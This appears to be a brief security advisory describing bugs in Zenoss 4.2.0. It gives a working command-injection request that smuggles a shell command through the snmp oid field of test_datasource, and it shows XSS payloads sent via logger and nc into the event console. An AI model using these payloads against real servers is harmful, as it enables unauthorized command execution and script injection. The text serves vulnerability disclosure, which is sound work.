Zenoss Security Bugs

Zenoss v 4.2.0 contains a number of bugs that may used to compromise a server running zenoss.

  • The test_datasource feature doesn't escape the snmp oid which is passed by zenoss to the shell as an argument for the snmpwalk command
example: https://[ZENOSS_HOST]/zport/dmd/Devices/rrdTemplates/Device/datasources/sysUpTime/test_datasource?data={%22newId%22:%22DetectedVirus%22,%22oid%22:%22$%28ls%20%3E%20/tmp/pwn%29%22,%22enabled%22:%22on%22,%22testDevice%22:%22127.0.0.1%22,%22uid%22:%22%22}
note: The device against which the snmpwalk is executed has to be known by zenoss (127.0.0.1 in the example).

  • Zenoss doesn't filter snmp strings being displayed in the web interface. This results in an xss vulnerability on the devicedetail page.

  • evconsole xss: screenshot
# logger -p local0.crit '<img src="http://wikee.iphwn.org/_media/s5l8900:pwned.gif?cache=" onload="javascript:alert(2)" />'

# echo '<130>' Aug 29 07:17:34 test '<iframe />' | nc -u zenoss 514 

Comments